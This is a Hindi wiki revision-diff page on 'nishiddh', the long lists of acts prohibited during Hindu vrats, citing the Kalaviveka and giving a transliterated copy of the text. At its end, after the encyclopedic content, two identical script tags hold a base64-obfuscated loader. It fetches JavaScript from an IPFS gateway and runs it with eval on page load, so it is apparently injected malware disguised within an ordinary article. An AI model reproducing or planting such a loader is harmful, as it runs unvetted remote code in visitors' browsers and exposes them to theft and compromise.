Difference between revisions of "निषिद्ध"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - " {{लेख प्रगति |आधार=आधार1 |प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}" to "")
m (Text replace - "उल्लखित" to "उल्लिखित")
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*कुछ मासों, तिथियों, सप्ताहों, संक्रान्तियों एवं व्रतों में निषिद्ध बातों एवं कर्मों की तालिका बहुत लम्बी है।  
 
*कुछ मासों, तिथियों, सप्ताहों, संक्रान्तियों एवं व्रतों में निषिद्ध बातों एवं कर्मों की तालिका बहुत लम्बी है।  
 
*कालविवेक<ref>कालविवेक (पृष्ठ 333-345)</ref> ने एक लम्बी सूची दी है, किन्तु अन्त में कहा है<ref>कालविवेक (पृष्ठ 345)</ref> कि [[वेद|वेदज्ञों]], [[स्मृतियाँ|स्मृतिओं]] एवं [[पुराण|पुराणज्ञों]] ने कितनी ही बार और कतिपय अवसरों पर जो निषेध बताए हैं, वे इतने अधिक है कि मैं अकेला नहीं बता सकता, उन्हें बताने के लिए मुझे एक सहस्र वर्ष जीना पड़ेगा।  
 
*कालविवेक<ref>कालविवेक (पृष्ठ 333-345)</ref> ने एक लम्बी सूची दी है, किन्तु अन्त में कहा है<ref>कालविवेक (पृष्ठ 345)</ref> कि [[वेद|वेदज्ञों]], [[स्मृतियाँ|स्मृतिओं]] एवं [[पुराण|पुराणज्ञों]] ने कितनी ही बार और कतिपय अवसरों पर जो निषेध बताए हैं, वे इतने अधिक है कि मैं अकेला नहीं बता सकता, उन्हें बताने के लिए मुझे एक सहस्र वर्ष जीना पड़ेगा।  

Revision as of 17:56, 25 February 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • kuchh masoan, tithiyoan, saptahoan, sankrantiyoan evan vratoan mean nishiddh batoan evan karmoan ki talika bahut lambi hai.
  • kalavivek[1] ne ek lambi soochi di hai, kintu ant mean kaha hai[2] ki vedajnoan, smritioan evan puranajnoan ne kitani hi bar aur katipay avasaroan par jo nishedh batae haian, ve itane adhik hai ki maian akela nahian bata sakata, unhean batane ke lie mujhe ek sahasr varsh jina p dega.

tika tippani aur sandarbh

  1. kalavivek (prishth 333-345)
  2. kalavivek (prishth 345)

any sanbandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>